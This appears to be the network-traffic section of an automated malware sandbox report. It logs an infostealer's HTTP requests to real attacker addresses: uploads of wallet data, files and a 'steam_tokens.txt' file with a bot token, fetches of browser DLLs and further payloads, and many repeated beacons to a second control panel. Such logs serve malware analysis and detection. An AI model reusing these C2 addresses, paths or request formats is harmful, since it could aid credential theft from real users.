0a Data Ascii: ------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="file"------HIDAAKEGDBFIJJKFHCFB--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 2d 2d 0d 0a Data Ascii: ------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="message"wallets------IEHJJECBKKECFIEBGCAK--
Source: global traffic HTTP traffic detected:
POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD
Host: 85.28.47.4
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a
Data Ascii:
------FCBFBGDBKJKECAAKKFHD
Content-Disposition: form-data; name="token"
369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4
------FCBFBGDBKJKECAAKKFHD
Content-Disposition: form-data; name="message"
files
------FCBFBGDBKJKECAAKKFHD--

Source: global traffic HTTP traffic detected:
POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECF
Host: 85.28.47.4
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 2d 2d 0d 0a
Data Ascii:
------DBGHDGHCGHCAAKFIIECF
Content-Disposition: form-data; name="token"
369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4
------DBGHDGHCGHCAAKFIIECF
Content-Disposition: form-data; name="file_name"
c3RlYW1fdG9rZW5zLnR4dA==
------DBGHDGHCGHCAAKFIIECF
Content-Disposition: form-data; name="file"
------DBGHDGHCGHCAAKFIIECF--

Source: global traffic HTTP traffic detected:
POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBA
Host: 85.28.47.4
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a
Data Ascii:
------CGDGCFBAEGDHJKEBGCBA
Content-Disposition: form-data; name="token"
369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4
------CGDGCFBAEGDHJKEBGCBA
Content-Disposition: form-data; name="message"
jbdtaijovg
------CGDGCFBAEGDHJKEBGCBA--

Source: global traffic HTTP traffic detected:
GET /mine/amadka.exe HTTP/1.1
Host: 77.91.77.81
Cache-Control: no-cache

Source: global traffic HTTP traffic detected:
POST /Hun4Ko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.82
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Source: global traffic HTTP traffic detected:
POST /Hun4Ko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.82
Content-Length: 162
Cache-Control: no-cache
Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5

Source: global traffic HTTP traffic detected:
GET /stealc/random.exe HTTP/1.1
Host: 77.91.77.81

Source: global traffic HTTP traffic detected:
POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCGIJKJJKEBGHJKFIDGC
Host: 85.28.47.4
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 46 33 35 46 37 42 46 35 46 38 32 38 37 36 35 33 34 35 39 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 2d 2d 0d 0a
Data Ascii:
------FCGIJKJJKEBGHJKFIDGC
Content-Disposition: form-data; name="hwid"
46F35F7BF5F82876534592
------FCGIJKJJKEBGHJKFIDGC
Content-Disposition: form-data; name="build"
default
------FCGIJKJJKEBGHJKFIDGC--

Source: global traffic HTTP traffic detected:
POST /Hun4Ko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.82
Content-Length: 31
Cache-Control: no-cache
Data Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
Data Ascii: d1=1000006001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 36 37 32 42 32 35 44 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A76B72672B25D82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
